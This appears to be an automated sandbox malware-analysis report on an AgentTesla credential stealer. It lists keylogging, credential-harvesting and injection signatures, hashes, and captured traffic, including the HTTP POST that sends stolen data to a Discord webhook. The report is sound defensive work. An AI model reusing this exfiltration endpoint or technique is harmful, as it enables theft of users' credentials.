Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e-dekont-20230207.exe

Overview

General Information

Sample Name:e-dekont-20230207.exe
Analysis ID:800710
MD5:2fbaa4d917cce04617f24f87309286d6
SHA1:7480ce7aebd7f59da7d6bd4f9eb7bba0efe05f97
SHA256:91eb17a8906ebbe9c50ef6a509e80133fd3322aec9b84e04cc5925992235c17e
Tags:exegeoTUR
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • e-dekont-20230207.exe (PID: 6072 cmdline: C:\Users\user\Desktop\e-dekont-20230207.exe MD5: 2FBAA4D917CCE04617F24F87309286D6)
    • CasPol.exe (PID: 6100 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    Process Memory Space: CasPol.exe PID: 6100JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      Process Memory Space: CasPol.exe PID: 6100JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.2.5162.159.128.233496904432851779 02/07/23-18:31:33.991128
        SID:2851779
        Source Port:49690
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: e-dekont-20230207.exeReversingLabs: Detection: 25%
        Machine Learning detection for sample
        Source: e-dekont-20230207.exeJoe Sandbox ML: detected
        Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49689 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49690 version: TLS 1.2
        Source: e-dekont-20230207.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: FUCKYOU.pdb source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: FUCKYOU.pdbxc source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: MPOIn6t.pdb source: e-dekont-20230207.exe

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49690 -> 162.159.128.233:443
        May check the online IP address of the machine
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewIP Address: 162.159.128.233 162.159.128.233
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1Content-Type: multipart/form-data; boundary=----------0d40611c92ae4655a6dec63fbd8447e1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1224Expect: 100-continueConnection: Keep-Alive
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
        Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 17:31:34 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=444c6840a70d11ed8760e6ba40672d66; Expires=Sun, 06-Feb-2028 17:31:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/strict-transport-security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Egxqsltc4qolLS4uzBaoE9%2FLaswRMsv8abKbQSPxREWUfQSPaTwB7kb7z0WOBsXz71TuPG8StdDXxsdUAHgNvhn4re6poX%2Bxo7O3WpOD0mQMHdrmzCmF8EGKAI5p"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __sdcfduid=444c6840a70d11ed8760e6ba40672d66dd69c8ba71cb11fcdcb8dbf0ca98829aacc0c779c3c769b75f558a3581eb9a0f; Expires=Sun, 06-Feb-2028 17:31:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/Set-Cookie: __cfruid=e3626c59acba08201b37fef2fc963ccf5c710641-1675791094; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 795ddc215dd0368a-FRA{"message": "Unknown Webhook", "code": 10015}
        Source: CasPol.exe, 00000001.00000003.312705815.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.577672379.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000001.00000003.312026803.0000000005BB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31
        Source: CasPol.exe, 00000001.00000002.575420221.0000000002C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com4Dp
        Source: unknownHTTP traffic detected: POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1Content-Type: multipart/form-data; boundary=----------0d40611c92ae4655a6dec63fbd8447e1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1224Expect: 100-continueConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49689 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.5:49690 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Installs a global keyboard hook
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_04DAA008
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_04DA9CC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_04DAA8D8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_04DAC898
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_063782BA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_063701A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_063729EC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06371730
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06371760
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0637BFF9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06373858
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_064DCDC8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_064D1848
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_064DA5DC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0687E0D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0687B0E8
        Source: e-dekont-20230207.exeStatic PE information: No import functions for PE file found
        Source: e-dekont-20230207.exe, 00000000.00000002.305649698.000000000106C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMPOIn6t.exe0 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.306294096.00000000133F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exe, 00000000.00000002.305766749.00000000015E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exeBinary or memory string: OriginalFilenameMPOIn6t.exe0 vs e-dekont-20230207.exe
        Source: e-dekont-20230207.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: e-dekont-20230207.exeReversingLabs: Detection: 25%
        Source: e-dekont-20230207.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\e-dekont-20230207.exe C:\Users\user\Desktop\e-dekont-20230207.exe
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e-dekont-20230207.exe.logJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
        Source: e-dekont-20230207.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csCryptographic APIs: 'CreateDecryptor'
        Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csCryptographic APIs: 'CreateDecryptor'
        Source: 1.2.CasPol.exe.400000.0.unpack, a/an2.csCryptographic APIs: 'CreateDecryptor'
        Source: 1.2.CasPol.exe.400000.0.unpack, a/aN1.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
        Source: 1.2.CasPol.exe.400000.0.unpack, a/aH1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: e-dekont-20230207.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: e-dekont-20230207.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: e-dekont-20230207.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: FUCKYOU.pdb source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: FUCKYOU.pdbxc source: e-dekont-20230207.exe, 00000000.00000002.305741549.0000000001580000.00000004.08000000.00040000.00000000.sdmp, e-dekont-20230207.exe, 00000000.00000002.306171624.00000000033F1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: MPOIn6t.pdb source: e-dekont-20230207.exe

        Data Obfuscation

        barindex
        .NET source code contains potential unpacker
        Source: e-dekont-20230207.exe, lFolC88Me9OogN66aU/uTrGBxypXmEijkBveq.cs.Net Code: wdpqhguLt System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, lFolC88Me9OogN66aU/uTrGBxypXmEijkBveq.cs.Net Code: wdpqhguLt System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, lFolC88Me9OogN66aU/uTrGBxypXmEijkBveq.cs.Net Code: wdpqhguLt System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        .NET source code contains method to dynamically call methods (often used by packers)
        Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_04DA0007 push edi; retf
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_064DEC72 push es; ret
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06871E87 push FFFFFF8Bh; iretd
        Source: e-dekont-20230207.exeStatic PE information: 0x9521C718 [Wed Apr 14 13:14:00 2049 UTC]
        Source: initial sampleStatic PE information: section name: .text entropy: 7.972775066304571
        Source: e-dekont-20230207.exe, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csHigh entropy of concatenated method names: '.cctor', 'JEIIEf39L4NlZ', 'sT5NLUvs1', 'dVvuEmeRP', 'JIYlJNBIO', 'hGNABewEJ', 'VCFUp38BF', 'WrSEiBqE9', 'FjGeLNshH', 'zp31VG5xf'
        Source: 0.2.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csHigh entropy of concatenated method names: '.cctor', 'JEIIEf39L4NlZ', 'sT5NLUvs1', 'dVvuEmeRP', 'JIYlJNBIO', 'hGNABewEJ', 'VCFUp38BF', 'WrSEiBqE9', 'FjGeLNshH', 'zp31VG5xf'
        Source: 0.0.e-dekont-20230207.exe.fc0000.0.unpack, FIey8LKsDYHYjq3QDO/mKSkeZw7IGSEi8OHt3.csHigh entropy of concatenated method names: '.cctor', 'JEIIEf39L4NlZ', 'sT5NLUvs1', 'dVvuEmeRP', 'JIYlJNBIO', 'hGNABewEJ', 'VCFUp38BF', 'WrSEiBqE9', 'FjGeLNshH', 'zp31VG5xf'
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\e-dekont-20230207.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
